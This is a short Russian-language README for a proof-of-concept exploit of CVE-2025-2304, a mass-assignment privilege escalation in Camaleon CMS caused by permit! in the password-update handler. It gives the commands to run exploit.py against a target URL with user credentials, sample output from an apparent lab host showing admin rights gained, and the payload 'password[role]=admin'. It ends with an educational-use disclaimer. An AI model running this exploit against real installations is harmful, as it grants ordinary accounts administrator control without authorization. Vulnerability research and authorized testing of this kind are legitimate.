
PoC для CVE-2025-2304 повышение привилегий в Camaleon CMS
Camaleon CMS уязвим для повышения привилегий через массовое присваивание
Повышение привилегий через массовое присваивание существует в Camaleon CMS
Когда пользователь хочет изменить свой пароль, вызывается метод 'updated_ajax' контроллера UsersController. Уязвимость возникает из-за использования опасного метода permit!, который пропускает все параметры без какой-либо фильтрации.
pip install requests beautifulsoup4
python exploit.py --url http://target.com -u username -p password
--url — базовый URL уязвимого приложения-u — имя пользователя для аутентификации-p — пароль для аутентификацииpython exploit.py --url http://facts.htb -u krrish -p krrish
Вывод:
[*] Logging in as krrish...
[*] Exploiting...
[+] Exploited! You're admin now
password[role]=adminЭтот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен.